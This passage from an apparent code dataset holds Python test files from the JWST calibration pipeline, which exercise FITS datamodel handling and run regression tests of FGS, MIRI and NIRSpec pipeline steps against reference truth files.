"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14940, "license_type": "permissive", "max_line_length": 115, "num_lines": 469, "path": "/jwst/datamodels/tests/test_fits.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nimport tempfile\n\nimport pytest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom asdf import schema as mschema\n\nfrom .. import DataModel, ImageModel, RampModel\nfrom ..util import open\n\nROOT_DIR = None\nFITS_FILE = None\nTMP_FITS = None\nTMP_FITS2 = None\nTMP_YAML = None\nTMP_JSON = None\nTMP_DIR = None\n\n\ndef setup():\n global ROOT_DIR, FITS_FILE, TMP_DIR, TMP_FITS, TMP_YAML, TMP_JSON, TMP_FITS2\n ROOT_DIR = os.path.join(os.path.dirname(__file__), 'data')\n FITS_FILE = os.path.join(ROOT_DIR, 'test.fits')\n\n TMP_DIR = tempfile.mkdtemp()\n TMP_FITS = os.path.join(TMP_DIR, 'tmp.fits')\n TMP_YAML = os.path.join(TMP_DIR, 'tmp.yaml')\n TMP_JSON = os.path.join(TMP_DIR, 'tmp.json')\n TMP_FITS2 = os.path.join(TMP_DIR, 'tmp2.fits')\n\n\ndef teardown():\n shutil.rmtree(TMP_DIR)\n\ndef records_equal(a, b):\n a = a.item()\n b = b.item()\n a_size = len(a)\n b_size = len(b)\n equal = a_size == b_size\n for i in range(a_size):\n if not equal: break\n equal = a[i] == b[i]\n return equal\n\ndef test_from_new_hdulist():\n with pytest.raises(AttributeError):\n from astropy.io import fits\n hdulist = fits.HDUList()\n with open(hdulist) as dm:\n dm.data\n\n\ndef test_from_new_hdulist2():\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n with open(hdulist) as dm:\n dq = dm.dq\n assert dq is not None\n\n\ndef test_setting_arrays_on_fits():\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n with open(hdulist) as dm:\n dm.data = np.empty((50, 50), dtype=np.float32)\n dm.dq = np.empty((10, 50, 50), dtype=np.uint32)\n\n\ndef delete_array():\n with pytest.raises(AttributeError):\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50))\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n hdulist.append(science)\n with open(hdulist) as dm:\n del dm.data\n assert len(hdulist) == 1\n\n\ndef test_from_fits():\n with RampModel(FITS_FILE) as dm:\n assert dm.meta.instrument.name == 'MIRI'\n assert dm.shape == (5, 35, 40, 32)\n\n\ndef test_from_scratch():\n with ImageModel((50, 50)) as dm:\n data = np.asarray(np.random.rand(50, 50), np.float32)\n dm.data[...] = data\n\n dm.meta.instrument.name = 'NIRCAM'\n\n dm.to_fits(TMP_FITS, overwrite=True)\n\n with ImageModel.from_fits(TMP_FITS) as dm2:\n assert dm2.shape == (50, 50)\n assert dm2.meta.instrument.name == 'NIRCAM'\n assert dm2.dq.dtype.name == 'uint32'\n assert np.all(dm2.data == data)\n\n\ndef test_delete():\n with DataModel(FITS_FILE) as dm:\n dm.meta.instrument.name = 'NIRCAM'\n assert dm.meta.instrument.name == 'NIRCAM'\n del dm.meta.instrument.name\n assert dm.meta.instrument.name is None\n\n\n# def test_section():\n# with RampModel((5, 35, 40, 32)) as dm:\n# section = dm.get_section('data')[3:4, 1:3]\n# assert section.shape == (1, 2, 40, 32)\n\n\n# def test_date_obs():\n# with DataModel(FITS_FILE) as dm:\n# assert dm.meta.observation.date.microsecond == 314592\n\n\ndef test_fits_without_sci():\n from astropy.io import fits\n schema = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"coeffs\": {\n 'max_ndim': 1,\n 'fits_hdu': 'COEFFS',\n 'datatype': 'float32'\n }\n }\n }\n ]\n }\n\n fits = fits.HDUList(\n [fits.PrimaryHDU(),\n fits.ImageHDU(name='COEFFS', data=np.array([0.0], np.float32))])\n\n with DataModel(fits, schema=schema) as dm:\n assert_array_equal(dm.coeffs, [0.0])\n\n\ndef _header_to_dict(x):\n return dict((a, b) for (a, b, c) in x)\n\n\ndef test_extra_fits():\n path = os.path.join(ROOT_DIR, \"headers.fits\")\n\n assert os.path.exists(path)\n\n with DataModel(path) as dm:\n assert 'BITPIX' not in _header_to_dict(dm.extra_fits.PRIMARY.header)\n assert _header_to_dict(dm.extra_fits.PRIMARY.header)['SCIYSTRT'] == 705\n dm2 = dm.copy()\n dm2.to_fits(TMP_FITS, overwrite=True)\n\n with DataModel(TMP_FITS) as dm:\n assert 'BITPIX' not in _header_to_dict(dm.extra_fits.PRIMARY.header)\n assert _header_to_dict(dm.extra_fits.PRIMARY.header)['SCIYSTRT'] == 705\n\n\ndef test_hdu_order():\n from astropy.io import fits\n\n with ImageModel(data=np.array([[0.0]]),\n dq=np.array([[0.0]]),\n err=np.array([[0.0]])) as dm:\n dm.save(TMP_FITS)\n\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert hdulist[1].header['EXTNAME'] == 'SCI'\n assert hdulist[2].header['EXTNAME'] == 'DQ'\n assert hdulist[3].header['EXTNAME'] == 'ERR'\n\n\ndef test_casting():\n with RampModel(FITS_FILE) as dm:\n sum = np.sum(dm.data)\n dm.data[:] = dm.data + 2\n assert np.sum(dm.data) > sum\n\n\n# def test_comments():\n# with RampModel(FITS_FILE) as dm:\n# assert 'COMMENT' in (x[0] for x in dm._extra_fits.PRIMARY)\n# dm._extra_fits.PRIMARY.COMMENT = ['foobar']\n# assert dm._extra_fits.PRIMARY.COMMENT == ['foobar']\n\n\ndef test_fits_comments():\n with ImageModel() as dm:\n dm.meta.subarray.xstart = 42\n dm.save(TMP_FITS, overwrite=True)\n\n from astropy.io import fits\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n header = hdulist[0].header\n find = ['Subarray parameters']\n found = 0\n\n for card in header.cards:\n if card[1] in find:\n found += 1\n\n assert found == len(find)\n\n\ndef test_metadata_doesnt_override():\n with ImageModel() as dm:\n dm.save(TMP_FITS, overwrite=True)\n\n from astropy.io import fits\n with fits.open(TMP_FITS, mode='update', memmap=False) as hdulist:\n hdulist[0].header['FILTER'] = 'F150W2'\n\n with ImageModel(TMP_FITS) as dm:\n assert dm.meta.instrument.filter == 'F150W2'\n\n\ndef test_table_with_metadata():\n schema = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\"type\": \"object\",\n \"properties\": {\n \"flux_table\": {\n \"title\": \"Photometric flux conversion table\",\n \"fits_hdu\": \"FLUX\",\n \"datatype\":\n [\n {\"name\": \"parameter\", \"datatype\": ['ascii', 7]},\n {\"name\": \"factor\", \"datatype\": \"float64\"},\n {\"name\": \"uncertainty\", \"datatype\": \"float64\"}\n ]\n },\n \"meta\": {\n \"type\": \"object\",\n \"properties\": {\n \"fluxinfo\": {\n \"title\": \"Information about the flux conversion\",\n \"type\": \"object\",\n \"properties\": {\n \"exposure\": {\n \"title\": \"Description of exposure analyzed\",\n \"type\": \"string\",\n \"fits_hdu\": \"FLUX\",\n \"fits_keyword\": \"FLUXEXP\"\n }\n }\n }\n }\n }\n }\n }\n ]\n }\n\n class FluxModel(DataModel):\n def __init__(self, init=None, flux_table=None, **kwargs):\n super(FluxModel, self).__init__(init=init, schema=schema, **kwargs)\n\n if flux_table is not None:\n self.flux_table = flux_table\n\n flux_im = [\n ('F560W', 1.0e-5, 1.0e-7),\n ('F770W', 1.1e-5, 1.6e-7),\n ]\n with FluxModel(flux_table=flux_im) as datamodel:\n datamodel.meta.fluxinfo.exposure = 'Exposure info'\n datamodel.save(TMP_FITS, overwrite=True)\n del datamodel\n\n from astropy.io import fits\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert len(hdulist) == 3\n assert isinstance(hdulist[1], fits.BinTableHDU)\n assert hdulist[1].name == 'FLUX'\n assert hdulist[2].name == 'ASDF'\n\n\ndef test_replace_table():\n from astropy.io import fits\n\n schema_narrow = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"data\": {\n \"title\": \"relative sensitivity table\",\n \"fits_hdu\": \"RELSENS\",\n \"datatype\": [\n {\"name\": \"TYPE\", \"datatype\": [\"ascii\", 16]},\n {\"name\": \"T_OFFSET\", \"datatype\": \"float32\"},\n {\"name\": \"DECAY_PEAK\", \"datatype\": \"float32\"},\n {\"name\": \"DECAY_FREQ\", \"datatype\": \"float32\"},\n {\"name\": \"TAU\", \"datatype\": \"float32\"}\n ]\n }\n }\n }\n ]\n }\n\n schema_wide = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"data\": {\n \"title\": \"relative sensitivity table\",\n \"fits_hdu\": \"RELSENS\",\n \"datatype\": [\n {\"name\": \"TYPE\", \"datatype\": [\"ascii\", 16]},\n {\"name\": \"T_OFFSET\", \"datatype\": \"float64\"},\n {\"name\": \"DECAY_PEAK\", \"datatype\": \"float64\"},\n {\"name\": \"DECAY_FREQ\", \"datatype\": \"float64\"},\n {\"name\": \"TAU\", \"datatype\": \"float64\"}\n ]\n }\n }\n }\n ]\n }\n\n x = np.array([(\"string\", 1., 2., 3., 4.)],\n dtype=[('TYPE', 'S16'),\n ('T_OFFSET', np.float32),\n ('DECAY_PEAK', np.float32),\n ('DECAY_FREQ', np.float32),\n ('TAU', np.float32)])\n\n m = DataModel(schema=schema_narrow)\n m.data = x\n m.to_fits(TMP_FITS, overwrite=True)\n\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert records_equal(x, np.asarray(hdulist[1].data))\n assert hdulist[1].data.dtype[1].str == '>f4'\n assert hdulist[1].header['TFORM2'] == 'E'\n\n with DataModel(TMP_FITS, schema=schema_wide) as m:\n m.to_fits(TMP_FITS2, overwrite=True)\n\n with fits.open(TMP_FITS2, memmap=False) as hdulist:\n assert records_equal(x, np.asarray(hdulist[1].data))\n assert hdulist[1].data.dtype[1].str == '>f8'\n assert hdulist[1].header['TFORM2'] == 'D'\n\n\ndef test_table_with_unsigned_int():\n schema = {\n 'title': 'Test data model',\n '$schema': 'http://stsci.edu/schemas/fits-schema/fits-schema',\n 'type': 'object',\n 'properties': {\n 'meta': {\n 'type': 'object',\n 'properties': {}\n },\n 'test_table': {\n 'title': 'Test table',\n 'fits_hdu': 'TESTTABL',\n 'datatype': [\n {'name': 'FLOAT64_COL', 'datatype': 'float64'},\n {'name': 'UINT32_COL', 'datatype': 'uint32'}\n ]\n }\n }\n }\n\n with DataModel(schema=schema) as dm:\n\n float64_info = np.finfo(np.float64)\n float64_arr = np.random.uniform(size=(10,))\n float64_arr[0] = float64_info.min\n float64_arr[-1] = float64_info.max\n\n uint32_info = np.iinfo(np.uint32)\n uint32_arr = np.random.randint(uint32_info.min, uint32_info.max + 1, size=(10,), dtype=np.uint32)\n uint32_arr[0] = uint32_info.min\n uint32_arr[-1] = uint32_info.max\n\n test_table = np.array(list(zip(float64_arr, uint32_arr)), dtype=dm.test_table.dtype)\n\n def assert_table_correct(model):\n for idx, (col_name, col_data) in enumerate([('float64_col', float64_arr), ('uint32_col', uint32_arr)]):\n # The table dtype and field dtype are stored separately, and may not\n # necessarily agree.\n assert np.can_cast(model.test_table.dtype[idx], col_data.dtype, 'equiv')\n assert np.can_cast(model.test_table.field(col_name).dtype, col_data.dtype, 'equiv')\n assert np.array_equal(model.test_table.field(col_name), col_data)\n\n # The datamodel casts our array to FITS_rec on assignment, so here we're\n # checking that the data survived the casting.\n dm.test_table = test_table\n assert_table_correct(dm)\n\n # Confirm that saving the table (and converting the uint32 values to signed int w/TZEROn)\n # doesn't mangle the data.\n dm.save(TMP_FITS)\n assert_table_correct(dm)\n\n # Confirm that the data loads from the file intact (converting the signed ints back to\n # the appropriate uint32 values).\n with DataModel(TMP_FITS, schema=schema) as dm2:\n assert_table_correct(dm2)\n\n\ndef test_metadata_from_fits():\n from astropy.io import fits\n\n mask = np.array([[0, 1], [2, 3]])\n fits.ImageHDU(data=mask, name='DQ').writeto(TMP_FITS, overwrite=True)\n with DataModel(init=TMP_FITS) as dm:\n dm.save(TMP_FITS2)\n\n with fits.open(TMP_FITS2, memmap=False) as hdulist:\n assert hdulist[2].name == 'ASDF'\n\n\n# def test_float_as_int():\n# from astropy.io import fits\n\n# hdulist = fits.HDUList()\n# primary = fits.PrimaryHDU()\n# hdulist.append(primary)\n# hdulist[0].header['SUBSTRT1'] = 42.7\n# hdulist.writeto(TMP_FITS, overwrite=True)\n\n# with DataModel(TMP_FITS) as dm:\n# assert dm.meta.subarray.xstart == 42.7\n" }, { "alpha_fraction": 0.5804020166397095, "alphanum_fraction": 0.6746231317520142, "avg_line_length": 30.84000015258789, "blob_id": "fe491c81d1de54aa5521458d28e8de218ed0a947", "content_id": "4f152dd1de4e470c396fd4c0f463e01bcfce7674", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 796, "license_type": "permissive", "max_line_length": 86, "num_lines": 25, "path": "/jwst/tests_nightly/general/fgs/test_fgs_image2_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_image2 import Image2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_fgs_image2pipeline1(self):\n \"\"\"\n\n Regression test of calwebb_image2 pipeline performed on FGS imaging mode data.\n\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw86500007001_02101_00001_GUIDER2_rate.fits')\n output_file = 'jw86500007001_02101_00001_GUIDER2_cal.fits'\n\n Image2Pipeline.call(input_file, save_results=True)\n\n outputs = [(output_file, 'jw86500007001_02101_00001_GUIDER2_cal_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.48168355226516724, "alphanum_fraction": 0.5767731666564941, "avg_line_length": 33.67567443847656, "blob_id": "e0174e46c37a3e2b2821de714ff72fd4bfa44e86", "content_id": "f8fb0fdea2a220fcbb28307cfed8595bc04d8668", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1283, "license_type": "permissive", "max_line_length": 104, "num_lines": 37, "path": "/jwst/tests_nightly/general/miri/test_mirilrs2_slitless.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_spec2pipeline', 'truth']\n\n def test_mirilrs2pipeline1(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on\n MIRI LRS slitless data.\n \"\"\"\n input_file = self.get_data('test_spec2pipeline',\n 'jw80600012001_02101_00003_mirimage_rateints.fits')\n\n collect_pipeline_cfgs()\n args = [ 'calwebb_tso-spec2.cfg',\n input_file,\n ]\n Step.from_cmdline(args)\n\n outputs = [('jw80600012001_02101_00003_mirimage_calints.fits',\n 'jw80600012001_02101_00003_mirimage_calints_ref.fits',\n ['primary', 'sci', 'err', 'dq']\n ),\n ('jw80600012001_02101_00003_mirimage_x1dints.fits',\n 'jw80600012001_02101_00003_mirimage_x1dints_ref.fits',\n ['primary', ('extract1d', 1), ('extract1d', 2), ('extract1d', 3), ('extract1d', 4)]\n )\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5553134083747864, "alphanum_fraction": 0.5952202081680298, "avg_line_length": 37.235633850097656, "blob_id": "67c991d82c4b7b2098b7a9d559947c1b86c782f2", "content_id": "d670711bd345f8f9493fb6e726d65e67740fe312", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13306, "license_type": "permissive", "max_line_length": 92, "num_lines": 348, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\n\nfrom numpy.testing import assert_allclose\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.assign_wcs import AssignWcsStep, nirspec\nfrom jwst.datamodels import ImageModel\nfrom jwst.pipeline import Detector1Pipeline, Spec2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.imprint import ImprintStep\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.master_background import MasterBackgroundStep\nfrom jwst import datamodels\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_detector1pipeline4(self):\n \"\"\"\n\n Regression test of calwebb_detector1 pipeline performed on NIRSpec data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84600007001_02101_00001_nrs1_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 4.0\n step.ramp_fit.save_opt = False\n step.output_file = 'jw84600007001_02101_00001_nrs1_rate.fits'\n step.run(input_file)\n\n outputs = [('jw84600007001_02101_00001_nrs1_ramp.fits',\n 'jw84600007001_02101_00001_nrs1_ramp_ref.fits'),\n ('jw84600007001_02101_00001_nrs1_rate.fits',\n 'jw84600007001_02101_00001_nrs1_rate_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecImprint(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_imprint', 'truth']\n test_dir = 'test_imprint'\n\n def test_imprint_nirspec(self):\n \"\"\"\n\n Regression test of imprint step performed on NIRSpec MSA data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00038001001_01101_00001_NRS1_rate.fits')\n model_file = self.get_data(self.test_dir,\n 'NRSMOS-MODEL-21_NRS1_rate.fits')\n\n result = ImprintStep.call(input_file, model_file, name='imprint')\n\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00038001001_01101_00001_NRS1_imprint.fits')]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecRampFit(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_nirspec(self):\n \"\"\"\n\n Regression test of ramp_fit step performed on NIRSpec data. This is a single\n integration dataset.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00023001001_01101_00001_NRS1_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits', name='RampFit'\n )\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00023001001_01101_00001_NRS1_ramp_fit.fits'),\n ('rampfit_opt_out_fitopt.fits',\n 'jw00023001001_01101_00001_NRS1_opt.fits',\n ['primary','slope','sigslope','yint','sigyint',\n 'pedestal','weights','crmag'])\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecWCS(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_wcs', 'nrs1-fs', 'truth']\n test_dir = ['test_wcs', 'nrs1-fs']\n\n def test_nirspec_nrs1_wcs(self):\n \"\"\"\n\n Regression test of creating a WCS object and doing pixel to sky transformation.\n\n \"\"\"\n input_file = self.get_data(*self.test_dir,\n 'jw00023001001_01101_00001_NRS1_ramp_fit.fits')\n ref_file = self.get_data(*self.ref_loc,\n 'jw00023001001_01101_00001_NRS1_ramp_fit_assign_wcs.fits')\n\n result = AssignWcsStep.call(input_file, save_results=True, suffix='assign_wcs')\n result.close()\n\n im = ImageModel(result.meta.filename)\n imref = ImageModel(ref_file)\n\n for slit in ['S200A1', 'S200A2', 'S400A1', 'S1600A1']:\n w = nirspec.nrs_wcs_set_input(im, slit)\n grid = grid_from_bounding_box(w.bounding_box)\n ra, dec, lam = w(*grid)\n wref = nirspec.nrs_wcs_set_input(imref, slit)\n raref, decref, lamref = wref(*grid)\n\n assert_allclose(ra, raref, equal_nan=True)\n assert_allclose(dec, decref, equal_nan=True)\n assert_allclose(lam, lamref, equal_nan=True)\n\n\[email protected]\nclass TestNRSSpec2(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_nrs_fs_single_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec fixed-slit data\n that uses a single-slit subarray (S200B1).\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84600002001_02101_00001_nrs2_rate.fits')\n step = Spec2Pipeline()\n step.save_bsub = True\n step.save_results = True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw84600002001_02101_00001_nrs2_cal.fits',\n 'jw84600002001_02101_00001_nrs2_cal_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_s2d.fits',\n 'jw84600002001_02101_00001_nrs2_s2d_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_x1d.fits',\n 'jw84600002001_02101_00001_nrs2_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecMasterBackground_FS(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_masterbackground', 'nrs-fs', 'truth']\n test_dir = ['test_masterbackground', 'nrs-fs']\n\n def test_nirspec_fs_masterbg_user(self):\n \"\"\"\n Regression test of master background subtraction for NRS FS when a\n user 1-D spectrum is provided.\n \"\"\"\n # input file has 2-D background image added to it\n\n input_file = self.get_data(*self.test_dir, 'nrs_sci+bkg_cal.fits')\n # user provided 1-D background was created from the 2-D background image\n input_1dbkg_file = self.get_data(*self.test_dir, 'nrs_bkg_user_clean_x1d.fits')\n\n result = MasterBackgroundStep.call(input_file,\n user_background=input_1dbkg_file,\n save_results=True)\n\n # Compare background-subtracted science data (results)\n # to a truth file. These data are MultiSlitModel data\n result_file = result.meta.filename\n\n truth_file = self.get_data(*self.ref_loc,\n 'nrs_sci+bkg_masterbackgroundstep.fits')\n\n outputs = [(result_file, truth_file)]\n self.compare_outputs(outputs)\n result.close()\n\n\[email protected]\nclass TestNIRSpecMasterBackground_IFU(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_masterbackground', 'nrs-ifu', 'truth']\n test_dir = ['test_masterbackground', 'nrs-ifu']\n\n def test_nirspec_ifu_masterbg_user(self):\n \"\"\"\n Regression test of master background subtraction for NRS IFU when a\n user 1-D spectrum is provided.\n \"\"\"\n # input file has 2-D background image added to it\n input_file = self.get_data(*self.test_dir, 'prism_sci_bkg_cal.fits')\n\n # user-provided 1-D background was created from the 2-D background image\n user_background = self.get_data(*self.test_dir, 'prism_bkg_x1d.fits')\n\n result = MasterBackgroundStep.call(input_file,\n user_background=user_background,\n save_results=True)\n\n # Test 2 compare the science data with no background\n # to the output from the masterBackground Subtraction step\n # background subtracted science image.\n input_sci_cal_file = self.get_data(*self.test_dir,\n 'prism_sci_cal.fits')\n input_sci_model = datamodels.open(input_sci_cal_file)\n\n # We don't want the slices gaps to impact the statisitic\n # loop over the 30 Slices\n for i in range(30):\n slice_wcs = nirspec.nrs_wcs_set_input(input_sci_model, i)\n x, y = grid_from_bounding_box(slice_wcs.bounding_box)\n ra, dec, lam = slice_wcs(x, y)\n valid = np.isfinite(lam)\n result_slice_region = result.data[y.astype(int), x.astype(int)]\n sci_slice_region = input_sci_model.data[y.astype(int),\n x.astype(int)]\n sci_slice = sci_slice_region[valid]\n result_slice = result_slice_region[valid]\n sub = result_slice - sci_slice\n\n # check for outliers in the science image\n sci_mean = np.nanmean(sci_slice)\n sci_std = np.nanstd(sci_slice)\n upper = sci_mean + sci_std*5.0\n lower = sci_mean - sci_std*5.0\n mask_clean = np.logical_and(sci_slice < upper, sci_slice > lower)\n\n sub_mean = np.absolute(np.nanmean(sub[mask_clean]))\n atol = 2.0\n assert_allclose(sub_mean, 0, atol=atol)\n\n # Test 3 Compare background sutracted science data (results)\n # to a truth file. This data is MultiSlit data\n\n input_sci_model.close()\n result_file = result.meta.filename\n truth_file = self.get_data(*self.ref_loc,\n 'prism_sci_bkg_masterbackgroundstep.fits')\n\n outputs = [(result_file, truth_file)]\n self.compare_outputs(outputs)\n input_sci_model.close()\n result.close()\n\n\[email protected]\nclass TestNIRSpecMasterBackground_MOS(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_masterbackground', 'nrs-mos', 'truth']\n test_dir = ['test_masterbackground', 'nrs-mos']\n\n def test_nirspec_mos_masterbg_user(self):\n \"\"\"\n Regression test of master background subtraction for NRS MOS when\n a user 1-D spectrum is provided.\n \"\"\"\n # input file has 2-D background image added to it\n input_file = self.get_data(*self.test_dir, 'nrs_mos_sci+bkg_cal.fits')\n # user provide 1-D background was created from the 2-D background image\n input_1dbkg_file = self.get_data(*self.test_dir, 'nrs_mos_bkg_x1d.fits')\n\n result = MasterBackgroundStep.call(input_file,\n user_background=input_1dbkg_file,\n save_results=True)\n\n # Compare background subtracted science data (results)\n # to a truth file. These data are MultiSlit data.\n result_file = result.meta.filename\n ref_file = self.get_data(*self.ref_loc, 'nrs_mos_sci+bkg_masterbackgroundstep.fits')\n\n outputs = [(result_file, ref_file)]\n self.compare_outputs(outputs)\n result.close()\n\[email protected]\nclass TestNIRSpecMasterBackgroundNodded(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_masterbackground', 'nrs-ifu', 'nodded', 'truth']\n test_dir = ['test_masterbackground', 'nrs-ifu', 'nodded']\n\n rtol = 0.000001\n\n def test_nirspec_masterbg_nodded(self):\n \"\"\"Run masterbackground step on NIRSpec association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'nirspec_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True\n )\n\n # test 1\n # compare background subtracted data to truth files\n # check that the cal_step master_background ran to complete\n outputs = []\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n\n result_file = model.meta.filename.replace('cal', 'master_background')\n truth_file = self.get_data(*self.ref_loc, result_file)\n\n outputs.append((result_file, truth_file))\n self.compare_outputs(outputs)\n\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'ifu_prism_source_off_fix_NRS1_o001_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5996652841567993, "alphanum_fraction": 0.6117515563964844, "avg_line_length": 25.106796264648438, "blob_id": "9f65d4b53bcff480ccf5e4109a17876913eb6b1b", "content_id": "9e34c0ed365732840395beab1e019a54c668a331", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5378, "license_type": "permissive", "max_line_length": 82, "num_lines": 206, "path": "/jwst/stpipe/tests/test_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from os.path import dirname, join, abspath\nimport sys\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport pytest\n\nfrom jwst.stpipe import Step, Pipeline, LinearPipeline\nfrom jwst import datamodels\n# TODO: Test system call steps\n\n\ndef library_function():\n import logging\n log = logging.getLogger()\n log.info(\"This is a library function log\")\n\n\nclass FlatField(Step):\n \"\"\"\n An example flat-fielding Step.\n \"\"\"\n\n # Load the spec from a file\n\n def process(self, science, flat):\n self.log.info(\"Removing flat field\")\n self.log.info(\"Threshold: {0}\".format(self.threshold))\n library_function()\n\n output = datamodels.ImageModel(data=science.data - flat.data)\n return output\n\n\nclass Combine(Step):\n \"\"\"\n A Step that combines a list of images.\n \"\"\"\n\n def process(self, images):\n combined = np.zeros((50, 50))\n for image in images:\n combined += image.data\n return datamodels.ImageModel(data=combined)\n\n\nclass Display(Step):\n \"\"\"\n A Step to display an image.\n \"\"\"\n\n def process(self, image):\n pass\n\n\nclass MultiplyBy2(Step):\n \"\"\"\n A Step that does the incredibly complex thing of multiplying by 2.\n \"\"\"\n\n def process(self, image):\n with datamodels.ImageModel(image) as dm:\n dm2 = datamodels.ImageModel()\n dm2.data = dm.data * 2\n return dm2\n\n\nclass MyPipeline(Pipeline):\n \"\"\"\n A test pipeline.\n \"\"\"\n\n step_defs = {\n 'flat_field': FlatField,\n 'combine': Combine,\n 'display': Display\n }\n\n spec = \"\"\"\n science_filename = input_file() # The input science filename\n flat_filename = input_file(default=None) # The input flat filename\n output_filename = output_file() 